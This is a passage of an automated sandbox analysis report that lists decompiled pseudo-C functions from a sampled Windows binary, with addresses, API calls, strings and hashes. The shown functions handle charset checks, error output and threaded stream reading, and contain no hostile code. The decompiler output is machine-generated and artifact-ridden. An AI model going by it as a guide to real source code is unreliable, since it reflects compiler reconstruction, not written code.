                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscmp
                                                                                                                    • String ID: UNC
                                                                                                                    • API String ID: 3392835482-337201128
                                                                                                                    • Opcode ID: 7791c43915b492e5203e5f21128f909281852c8def42ff80f0aa9d1e422cf4a7
                                                                                                                    • Instruction ID: 466bb310c89dbb7c9080ced9f6cc14cb701039092a4fa7074a302ca997b956e2
                                                                                                                    • Opcode Fuzzy Hash: 7791c43915b492e5203e5f21128f909281852c8def42ff80f0aa9d1e422cf4a7
                                                                                                                    • Instruction Fuzzy Hash: 0A21533A300201DFCB28DB58D9D4AA5B3E1FF86750B6584EAE6559F3A5C731EC84CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B22635 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00B22635(intOrPtr* __ecx, signed int __edx) {
				signed int _t29;
				void* _t30;
				intOrPtr _t37;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr _t61;
				void* _t63;

				L00B7F140(0xb836ec, _t63);
				_t45 =  *__ecx;
				_t29 = __edx + __edx * 4;
				_push(_t60);
				_t30 = _t45 + _t29 * 4;
				if( *((char*)(_t45 + _t29 * 4)) != 0) {
					E00B12EA8(_t63 - 0x18, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8)) +  *(_t30 + 0xc) * 4 - 4)));
					_t58 = 0;
					 *((intOrPtr*)(_t63 - 4)) = 0;
					_t33 = E00B20BD7( *((intOrPtr*)(_t63 - 0x18)), _t63 + 0xc);
					__eflags = _t33;
					if(_t33 == 0) {
						L4:
						E00B122CE( *((intOrPtr*)(_t63 - 0x18)));
						asm("sbb ebx, ebx");
						_t42 = ( ~( *(_t63 + 8)) & 0xfffffffe) + 5;
						__eflags = _t42;
						if(__eflags == 0) {
							L8:
							_push( *((intOrPtr*)(_t63 - 0x18)));
							_push("Unsupported charset:");
							E00B30B3C(_t63 - 0x24, __eflags);
							_t33 = _t63 - 0x24;
							_push(0xb91428);
							_push(_t63 - 0x24);
							L00B7F160();
						} else {
							_t60 = 0xb89cb0;
							while(1) {
								_t33 = E00B123F5( *((intOrPtr*)(_t63 - 0x18)),  *_t60);
								__eflags = _t33;
								if(_t33 != 0) {
									goto L9;
								}
								_t58 = _t58 + 1;
								_t60 = _t60 + 8;
								__eflags = _t58 - _t42;
								if(__eflags != 0) {
									continue;
								} else {
									goto L8;
								}
								goto L9;
							}
						}
						L9:
						_t24 = _t60 + 4; // 0x0
						_t61 =  *_t24;
					} else {
						_t61 =  *((intOrPtr*)(_t63 + 0xc));
						__eflags = _t61 - 0x10000;
						if(_t61 >= 0x10000) {
							goto L4;
						}
					}
					E00B11E89(_t33,  *((intOrPtr*)(_t63 - 0x18)));
					_t37 = _t61;
				} else {
					_t37 =  *((intOrPtr*)(_t63 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t37;
			}












                                                                                                                    0x00b2263a
                                                                                                                    0x00b22642
                                                                                                                    0x00b22644
                                                                                                                    0x00b22648
                                                                                                                    0x00b2264d
                                                                                                                    0x00b22651
                                                                                                                    0x00b22668
                                                                                                                    0x00b22670
                                                                                                                    0x00b22675
                                                                                                                    0x00b22678
                                                                                                                    0x00b2267d
                                                                                                                    0x00b2267f
                                                                                                                    0x00b2268c
                                                                                                                    0x00b2268f
                                                                                                                    0x00b22699
                                                                                                                    0x00b2269e
                                                                                                                    0x00b2269e
                                                                                                                    0x00b226a1
                                                                                                                    0x00b226be
                                                                                                                    0x00b226be
                                                                                                                    0x00b226c4
                                                                                                                    0x00b226c9
                                                                                                                    0x00b226ce
                                                                                                                    0x00b226d1
                                                                                                                    0x00b226d6
                                                                                                                    0x00b226d7
                                                                                                                    0x00b226a3
                                                                                                                    0x00b226a3
                                                                                                                    0x00b226a8
                                                                                                                    0x00b226ad
                                                                                                                    0x00b226b2
                                                                                                                    0x00b226b4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b226b6
                                                                                                                    0x00b226b7
                                                                                                                    0x00b226ba
                                                                                                                    0x00b226bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b226bc
                                                                                                                    0x00b226a8
                                                                                                                    0x00b226dc
                                                                                                                    0x00b226dc
                                                                                                                    0x00b226dc
                                                                                                                    0x00b22681
                                                                                                                    0x00b22681
                                                                                                                    0x00b22684
                                                                                                                    0x00b2268a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2268a
                                                                                                                    0x00b226e2
                                                                                                                    0x00b226e8
                                                                                                                    0x00b22653
                                                                                                                    0x00b22653
                                                                                                                    0x00b22653
                                                                                                                    0x00b226f0
                                                                                                                    0x00b226f8

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B2263A
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B226D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologThrow
                                                                                                                    • String ID: Unsupported charset:
                                                                                                                    • API String ID: 461045715-616772432
                                                                                                                    • Opcode ID: a27257553015c233c8ed913dd18f1882f5ea61159ad28e621b70cf7121f72bf2
                                                                                                                    • Instruction ID: ecb37b072a098db864def2211892b90e85f9df1b49c29790b055c35acb899606
                                                                                                                    • Opcode Fuzzy Hash: a27257553015c233c8ed913dd18f1882f5ea61159ad28e621b70cf7121f72bf2
                                                                                                                    • Instruction Fuzzy Hash: BB21F373A00019ABCF11EF98D8819EDB7F1EF49314F5440E8E959AB251CB31AD86CB80
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B48DDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B48DDC(intOrPtr __ebx) {
				intOrPtr _t25;
				intOrPtr* _t29;
				intOrPtr _t34;
				struct _IO_FILE** _t37;
				intOrPtr _t39;
				intOrPtr* _t56;
				void* _t58;

				_t39 = __ebx;
				_t56 =  *0xb9a894; // 0xb9a5b0
				if(_t56 == __ebx) {
					_t56 = 0xb9a5b0;
				}
				_t25 = E00B441C3(_t58 - 0x2a4,  *((intOrPtr*)(_t58 - 0x110)),  *_t56);
				 *((intOrPtr*)(_t58 - 0x20)) = _t25;
				if(_t25 == 1) {
					E00B11FE9(_t56);
					_t37 =  *0xb9a898; // 0xb9a5a0
					if(_t37 != _t39) {
						fputs("\nDecoding ERROR\n",  *_t37);
					}
					 *((intOrPtr*)(_t58 - 0x28)) = 2;
					 *((intOrPtr*)(_t58 - 0x20)) = _t39;
				}
				if( *((char*)(_t58 - 0x334)) != 0 &&  *0xb9a894 != 0) {
					E00B4A7BC();
				}
				E00B11E89(E00B4A7A1( *((intOrPtr*)(_t58 - 0x20))),  *((intOrPtr*)(_t58 - 0xcc)));
				 *(_t58 - 4) = 6;
				E00B32046(_t58 - 0xc0);
				_t29 =  *((intOrPtr*)(_t58 - 0x2c));
				 *(_t58 - 4) = 4;
				_t66 = _t29;
				if(_t29 != 0) {
					_t29 =  *((intOrPtr*)( *_t29 + 8))(_t29);
				}
				 *(_t58 - 4) = 2;
				E00B11E89(_t29,  *((intOrPtr*)(_t58 - 0xdc)));
				L00B111C2(_t58 - 0x108);
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				E00B4AC40(_t39, _t58 - 0x340, _t66);
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				L00B41B84(_t39, _t58 - 0x6c);
				_t34 =  *((intOrPtr*)(_t58 - 0x28));
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t34;
			}










                                                                                                                    0x00b48ddc
                                                                                                                    0x00b48ddc
                                                                                                                    0x00b48de4
                                                                                                                    0x00b48de6
                                                                                                                    0x00b48de6
                                                                                                                    0x00b48df9
                                                                                                                    0x00b48e01
                                                                                                                    0x00b48e04
                                                                                                                    0x00b48e0c
                                                                                                                    0x00b48e11
                                                                                                                    0x00b48e18
                                                                                                                    0x00b48e21
                                                                                                                    0x00b48e28
                                                                                                                    0x00b48e29
                                                                                                                    0x00b48e30
                                                                                                                    0x00b48e30
                                                                                                                    0x00b49a59
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a77
                                                                                                                    0x00b49a7d
                                                                                                                    0x00b49a87
                                                                                                                    0x00b49a8c
                                                                                                                    0x00b49a8f
                                                                                                                    0x00b49a93
                                                                                                                    0x00b49a95
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49aa3
                                                                                                                    0x00b49aa7
                                                                                                                    0x00b49ab3
                                                                                                                    0x00b49ab8
                                                                                                                    0x00b49ac2
                                                                                                                    0x00b49ac7
                                                                                                                    0x00b49ace
                                                                                                                    0x00b49ad3
                                                                                                                    0x00b49adc
                                                                                                                    0x00b49ae4

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs
                                                                                                                    • String ID: Decoding ERROR$S
                                                                                                                    • API String ID: 1795875747-3281273935
                                                                                                                    • Opcode ID: 7fda0562778a99c7f0f8ee9195e0ea8e9ef547e4c6b157e54ba60118ca108557
                                                                                                                    • Instruction ID: 807c5b5ab5cbb31c2268fa0ec92283758df944c1eed3f6239c37ea41a6caf9bf
                                                                                                                    • Opcode Fuzzy Hash: 7fda0562778a99c7f0f8ee9195e0ea8e9ef547e4c6b157e54ba60118ca108557
                                                                                                                    • Instruction Fuzzy Hash: B4218931D00118DBDF25EBA8D885BDCBBF1EB58314F2401E9E505A71A2DB341F85DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B483B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B483B6(struct _IO_FILE** __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8) {
				struct _IO_FILE** _t12;

				_t12 = __ecx;
				fputs(__edx,  *__ecx);
				fputs(0xb8cfc8,  *_t12);
				return E00B11FE9(E00B1224A(_t12, _a4, _a8));
			}




                                                                                                                    0x00b483b7
                                                                                                                    0x00b483c3
                                                                                                                    0x00b483cc
                                                                                                                    0x00b483e9

                                                                                                                    APIs
                                                                                                                    • fputs.MSVCRT ref: 00B483C3
                                                                                                                    • fputs.MSVCRT ref: 00B483CC
                                                                                                                      • Part of subcall function 00B1224A: fputs.MSVCRT ref: 00B12267
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$fputc
                                                                                                                    • String ID: Archives
                                                                                                                    • API String ID: 1185151155-454332015
                                                                                                                    • Opcode ID: d8acdbfe3d2ffbcf951450e85cb14cea05a446cc671b1d7c8b711fc9a9682418
                                                                                                                    • Instruction ID: 1d4a6f64ff4564aa4ce110e9e5529a793c23810213f2ab9e1a7a51fdf775f9be
                                                                                                                    • Opcode Fuzzy Hash: d8acdbfe3d2ffbcf951450e85cb14cea05a446cc671b1d7c8b711fc9a9682418
                                                                                                                    • Instruction Fuzzy Hash: 55D012322042506BCB117BA99C15C6EBAE6EFC47107060C5EF580431B1DA714865DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B7641C Relevance: 5.2, APIs: 4, Instructions: 156COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00B7641C(intOrPtr* __esi) {
				signed int _t132;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int* _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t153;
				intOrPtr _t159;
				signed int _t164;
				intOrPtr _t170;
				signed int _t175;
				intOrPtr _t180;
				signed int _t181;
				signed int _t183;
				signed int _t186;
				signed int _t198;
				intOrPtr _t206;
				intOrPtr _t209;
				intOrPtr _t219;
				signed int _t229;
				struct _CRITICAL_SECTION* _t232;
				intOrPtr* _t234;
				intOrPtr _t238;
				signed int _t242;
				intOrPtr _t243;
				void* _t245;
				void* _t272;

				_t234 = __esi;
				while(1) {
					_t181 =  *(_t245 + 0x34);
					if( *(_t234 + 0x38) != 0) {
						break;
					}
					_t229 = E00B76CA0(_t234 + 0x208);
					 *((intOrPtr*)(_t245 + 0x14)) = 0;
					 *((intOrPtr*)(_t245 + 0x24)) = 0;
					 *(_t245 + 0x10) = 1;
					if(_t229 == 0) {
						_t206 =  *_t234;
						 *((intOrPtr*)(_t245 + 0x14)) = _t206;
						if( *((intOrPtr*)(_t234 + 0x10)) == 0) {
							_t181 =  *(_t234 + 0x18);
							_t243 =  *((intOrPtr*)(_t234 + 0xb0));
							_t219 =  *((intOrPtr*)(_t234 + 0xb4));
							_t170 = _t181 - _t243;
							if(_t206 > _t170) {
								_t206 = _t170;
								 *((intOrPtr*)(_t245 + 0x14)) = _t206;
							}
							_t238 = _t243 + _t206;
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t245 + 0x24)) =  *((intOrPtr*)(_t234 + 0x14)) + _t243;
							 *((intOrPtr*)(_t245 + 0x2c)) = _t219;
							 *((intOrPtr*)(_t234 + 0xb0)) = _t238;
							 *((intOrPtr*)(_t234 + 0xb4)) = _t219;
							 *(_t245 + 0x10) = 0 | _t181 == _t238;
						} else {
							if( *((intOrPtr*)(_t181 + 0xc)) != 0) {
								L8:
								_t175 = L00B6B020( *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t181 + 0xc)), _t245 + 0x14);
								_t209 =  *((intOrPtr*)(_t245 + 0x14));
								_t229 = _t175;
								_t238 = _t209 +  *((intOrPtr*)(_t234 + 0xb0));
								asm("adc eax, [esi+0xb4]");
								 *((intOrPtr*)(_t234 + 0xb0)) = _t238;
								 *((intOrPtr*)(_t245 + 0x2c)) = 0;
								 *((intOrPtr*)(_t234 + 0xb4)) = 0;
								if(_t229 == 0) {
									 *(_t245 + 0x10) = 0 | _t209 !=  *_t234;
								} else {
									goto L9;
								}
							} else {
								_t180 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x20))))))();
								 *((intOrPtr*)(_t181 + 0xc)) = _t180;
								if(_t180 != 0) {
									goto L8;
								} else {
									_t12 = _t180 + 2; // 0x2
									_t229 = _t12;
									L9:
									 *(_t234 + 0x3c) = _t229;
									E00B76CC0(_t234 + 0x208, _t229);
								}
							}
						}
					}
					 *(_t245 + 0x20) = 0;
					if(L00B77D90( *((intOrPtr*)(_t234 + 0x34))) != 0) {
						 *(_t245 + 0x20) = 0xc;
						if(_t229 == 0) {
							_t229 = 0xc;
						}
					}
					_t138 =  *(_t234 + 0xa8);
					 *(_t245 + 0x18) = _t138;
					_t139 = _t138 + 1;
					 *(_t234 + 0xa8) = _t139;
					if(_t139 >=  *((intOrPtr*)(_t234 + 0xa4))) {
						 *(_t234 + 0xa8) = 0;
					}
					_t183 = _t181 | 0xffffffff;
					if(_t229 != 0) {
						L28:
						 *(_t245 + 0x10) = 1;
						goto L29;
					} else {
						_t164 = E00B76CA0(_t234 + 0x208);
						_t229 = _t164;
						if(_t229 != 0) {
							goto L28;
						} else {
							if( *(_t245 + 0x10) != _t164) {
								L29:
								 *(_t234 + 0x38) = 1;
							} else {
								_t165 =  *(_t234 + 0xa0);
								if( *(_t234 + 0xa0) <  *((intOrPtr*)(_t234 + 0x9c)) && ( *((intOrPtr*)(_t234 + 8)) != _t238 ||  *((intOrPtr*)(_t234 + 0xc)) !=  *((intOrPtr*)(_t245 + 0x2c)))) {
									_t229 = E00B76990(_t234 + 0x5c8 + (_t165 + _t165 * 2) * 8);
									if(_t229 != 0) {
										E00B76CC0(_t234 + 0x208, _t229);
										goto L28;
									} else {
										 *(_t234 + 0xa0) =  *(_t234 + 0xa0) + 1;
									}
								}
							}
						}
					}
					if(L00B77EB0( *((intOrPtr*)(_t245 + 0x1c))) != 0) {
						L67:
						return 0xc;
					} else {
						_t142 =  *(_t245 + 0x20);
						if(_t142 != 0) {
							L70:
							return _t142;
						} else {
							if(_t229 == 0) {
								_t232 = _t234 + 0xb8;
								EnterCriticalSection(_t232);
								_t183 =  *(_t234 + 0xd0);
								 *(_t234 + 0xd0) =  *(_t234 + 0xd4 + _t183 * 4);
								LeaveCriticalSection(_t232);
								if( *((intOrPtr*)(_t234 + 0x10)) == 0) {
									_t159 =  *((intOrPtr*)(_t245 + 0x24));
								} else {
									_t159 =  *((intOrPtr*)( *(_t245 + 0x34) + 0xc));
								}
								_t229 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x24))))))(_t183, _t159,  *((intOrPtr*)(_t245 + 0x14)),  *(_t245 + 0x10));
								if(_t229 != 0) {
									E00B76CC0(_t234 + 0x208, _t229);
								}
							}
							_t144 = _t234 + 0x238 + ( *(_t245 + 0x18) +  *(_t245 + 0x18) * 2) * 4;
							 *_t144 = _t229;
							_t144[1] = _t183;
							_t144[2] =  *(_t245 + 0x10);
							EnterCriticalSection(_t234 + 0xb8);
							_t242 =  *(_t234 + 0x48);
							_t146 =  *(_t245 + 0x18);
							if(_t242 != _t146) {
								 *((char*)(_t146 + _t234 + 0x4c)) = 1;
							} else {
								 *(_t234 + 0x48) = 0xffffffff;
							}
							LeaveCriticalSection(_t234 + 0xb8);
							if(_t242 ==  *(_t245 + 0x18)) {
								_t148 =  *(_t234 + 0x44);
								if(_t148 != 0) {
									_t229 = _t148;
								}
								L46:
								L46:
								if(_t229 == 0 && _t183 != 0xffffffff) {
									_t229 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 + 0x24)) + 4))))();
									if(_t229 != 0) {
										 *(_t234 + 0x44) = _t229;
										E00B76CC0(_t234 + 0x208, _t229);
									}
								}
								_t242 = _t242 + 1;
								if(_t242 >=  *((intOrPtr*)(_t234 + 0xa4))) {
									_t242 = 0;
								}
								EnterCriticalSection(_t234 + 0xb8);
								if(_t183 != 0xffffffff) {
									 *(_t234 + 0xd4 + _t183 * 4) =  *(_t234 + 0xd0);
									 *(_t234 + 0xd0) = _t183;
								}
								_t186 =  *(_t234 + _t242 + 0x4c) & 0x000000ff;
								if(_t186 == 0) {
									 *(_t234 + 0x48) = _t242;
								} else {
									 *(_t234 + _t242 + 0x4c) = 0;
								}
								LeaveCriticalSection(_t234 + 0xb8);
								if(L00B77FE0(_t234 + 0x34) != 0) {
									goto L67;
								}
								if(_t186 == 0) {
									if( *(_t245 + 0x10) != 0) {
										goto L69;
									} else {
										goto L65;
									}
								} else {
									_t153 = _t234 + 0x238 + (_t242 + _t242 * 2) * 4;
									if(_t229 == 0) {
										_t198 =  *_t153;
										if(_t198 != 0) {
											_t229 = _t198;
										}
									}
									_t183 = _t153[1];
									 *(_t245 + 0x10) = _t153[2];
									goto L46;
								}
							} else {
								if(_t229 != 0) {
									L69:
									_t142 = 0;
									goto L70;
								} else {
									_t272 =  *(_t245 + 0x10) - _t229;
									L65:
									if(_t272 != 0) {
										goto L69;
									} else {
										_t238 = 0;
										 *((intOrPtr*)(_t245 + 0x2c)) = 0;
										if(L00B77D90( *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x1c))))) == 0) {
											continue;
										} else {
											goto L67;
										}
									}
								}
							}
						}
					}
					L71:
				}
				_t132 = L00B77EB0( *((intOrPtr*)(_t245 + 0x1c)));
				asm("sbb eax, eax");
				return  ~_t132 & 0x0000000c;
				goto L71;
			}































                                                                                                                    0x00b7641c
                                                                                                                    0x00b76420
                                                                                                                    0x00b76420
                                                                                                                    0x00b76428
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b76439
                                                                                                                    0x00b7643d
                                                                                                                    0x00b76441
                                                                                                                    0x00b76445
                                                                                                                    0x00b7644f
                                                                                                                    0x00b76455
                                                                                                                    0x00b76457
                                                                                                                    0x00b7645e
                                                                                                                    0x00b764d5
                                                                                                                    0x00b764d8
                                                                                                                    0x00b764de
                                                                                                                    0x00b764e6
                                                                                                                    0x00b764ea
                                                                                                                    0x00b764ec
                                                                                                                    0x00b764ee
                                                                                                                    0x00b764ee
                                                                                                                    0x00b764f7
                                                                                                                    0x00b764f9
                                                                                                                    0x00b764fc
                                                                                                                    0x00b76507
                                                                                                                    0x00b7650b
                                                                                                                    0x00b76511
                                                                                                                    0x00b76517
                                                                                                                    0x00b76460
                                                                                                                    0x00b76463
                                                                                                                    0x00b7647c
                                                                                                                    0x00b76487
                                                                                                                    0x00b7648c
                                                                                                                    0x00b76490
                                                                                                                    0x00b76496
                                                                                                                    0x00b7649c
                                                                                                                    0x00b764a2
                                                                                                                    0x00b764a8
                                                                                                                    0x00b764ac
                                                                                                                    0x00b764b4
                                                                                                                    0x00b764cf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b76465
                                                                                                                    0x00b7646e
                                                                                                                    0x00b76470
                                                                                                                    0x00b76475
                                                                                                                    0x00000000
                                                                                                                    0x00b76477
                                                                                                                    0x00b76477
                                                                                                                    0x00b76477
                                                                                                                    0x00b764b6
                                                                                                                    0x00b764be
                                                                                                                    0x00b764c1
                                                                                                                    0x00b764c1
                                                                                                                    0x00b76475
                                                                                                                    0x00b76463
                                                                                                                    0x00b7645e
                                                                                                                    0x00b7651e
                                                                                                                    0x00b7652d
                                                                                                                    0x00b7652f
                                                                                                                    0x00b76539
                                                                                                                    0x00b7653b
                                                                                                                    0x00b7653b
                                                                                                                    0x00b76539
                                                                                                                    0x00b76540
                                                                                                                    0x00b76546
                                                                                                                    0x00b7654a
                                                                                                                    0x00b7654b
                                                                                                                    0x00b76557
                                                                                                                    0x00b76559
                                                                                                                    0x00b76559
                                                                                                                    0x00b76563
                                                                                                                    0x00b76568
                                                                                                                    0x00b765c7
                                                                                                                    0x00b765c7
                                                                                                                    0x00000000
                                                                                                                    0x00b7656a
                                                                                                                    0x00b76570
                                                                                                                    0x00b76575
                                                                                                                    0x00b76579
                                                                                                                    0x00000000
                                                                                                                    0x00b7657b
                                                                                                                    0x00b7657f
                                                                                                                    0x00b765cf
                                                                                                                    0x00b765cf
                                                                                                                    0x00b76581
                                                                                                                    0x00b76581
                                                                                                                    0x00b7658d
                                                                                                                    0x00b765ac
                                                                                                                    0x00b765b0
                                                                                                                    0x00b765c2
                                                                                                                    0x00000000
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b2
                                                                                                                    0x00b765b0
                                                                                                                    0x00b7658d
                                                                                                                    0x00b7657f
                                                                                                                    0x00b76579
                                                                                                                    0x00b765e1
                                                                                                                    0x00b767a6
                                                                                                                    0x00b767b2
                                                                                                                    0x00b765e7
                                                                                                                    0x00b765e7
                                                                                                                    0x00b765ed
                                                                                                                    0x00b767d1
                                                                                                                    0x00b767d8
                                                                                                                    0x00b765f3
                                                                                                                    0x00b765f5
                                                                                                                    0x00b765f7
                                                                                                                    0x00b765fe
                                                                                                                    0x00b76604
                                                                                                                    0x00b76612
                                                                                                                    0x00b76618
                                                                                                                    0x00b76622
                                                                                                                    0x00b7662d
                                                                                                                    0x00b76624
                                                                                                                    0x00b76628
                                                                                                                    0x00b76628
                                                                                                                    0x00b7664e
                                                                                                                    0x00b76652
                                                                                                                    0x00b7665c
                                                                                                                    0x00b7665c
                                                                                                                    0x00b76652
                                                                                                                    0x00b7666c
                                                                                                                    0x00b76673
                                                                                                                    0x00b76675
                                                                                                                    0x00b76678
                                                                                                                    0x00b76682
                                                                                                                    0x00b76688
                                                                                                                    0x00b7668b
                                                                                                                    0x00b76691
                                                                                                                    0x00b7669c
                                                                                                                    0x00b76693
                                                                                                                    0x00b76693
                                                                                                                    0x00b76693
                                                                                                                    0x00b766a8
                                                                                                                    0x00b766b2
                                                                                                                    0x00b766c5
                                                                                                                    0x00b766ca
                                                                                                                    0x00b766cc
                                                                                                                    0x00b766cc
                                                                                                                    0x00000000
                                                                                                                    0x00b766d0
                                                                                                                    0x00b766d2
                                                                                                                    0x00b766e6
                                                                                                                    0x00b766ea
                                                                                                                    0x00b766f4
                                                                                                                    0x00b766f7
                                                                                                                    0x00b766f7
                                                                                                                    0x00b766ea
                                                                                                                    0x00b766fc
                                                                                                                    0x00b76703
                                                                                                                    0x00b76705
                                                                                                                    0x00b76705
                                                                                                                    0x00b7670e
                                                                                                                    0x00b76717
                                                                                                                    0x00b7671f
                                                                                                                    0x00b76726
                                                                                                                    0x00b76726
                                                                                                                    0x00b7672c
                                                                                                                    0x00b76733
                                                                                                                    0x00b7673c
                                                                                                                    0x00b76735
                                                                                                                    0x00b76735
                                                                                                                    0x00b76735
                                                                                                                    0x00b76746
                                                                                                                    0x00b76756
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7675a
                                                                                                                    0x00b76787
                                                                                                                    0x00000000
                                                                                                                    0x00b76789
                                                                                                                    0x00000000
                                                                                                                    0x00b76789
                                                                                                                    0x00b7675c
                                                                                                                    0x00b76760
                                                                                                                    0x00b76769
                                                                                                                    0x00b7676b
                                                                                                                    0x00b7676f
                                                                                                                    0x00b76771
                                                                                                                    0x00b76771
                                                                                                                    0x00b7676f
                                                                                                                    0x00b76773
                                                                                                                    0x00b76779
                                                                                                                    0x00000000
                                                                                                                    0x00b76779
                                                                                                                    0x00b766b4
                                                                                                                    0x00b766b6
                                                                                                                    0x00b767cf
                                                                                                                    0x00b767cf
                                                                                                                    0x00000000
                                                                                                                    0x00b766bc
                                                                                                                    0x00b766bc
                                                                                                                    0x00b7678b
                                                                                                                    0x00b7678b
                                                                                                                    0x00000000
                                                                                                                    0x00b7678d
                                                                                                                    0x00b76793
                                                                                                                    0x00b76795
                                                                                                                    0x00b767a0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b767a0
                                                                                                                    0x00b7678b
                                                                                                                    0x00b766b6
                                                                                                                    0x00b766b2
                                                                                                                    0x00b765ed
                                                                                                                    0x00000000
                                                                                                                    0x00b765e1
                                                                                                                    0x00b767b9
                                                                                                                    0x00b767c2
                                                                                                                    0x00b767cc
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B76CA0: EnterCriticalSection.KERNEL32(?,?,?,00B76439), ref: 00B76CA8
                                                                                                                      • Part of subcall function 00B76CA0: LeaveCriticalSection.KERNEL32(?,?,?,00B76439), ref: 00B76CB2
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B765FE
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B76618
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B76682
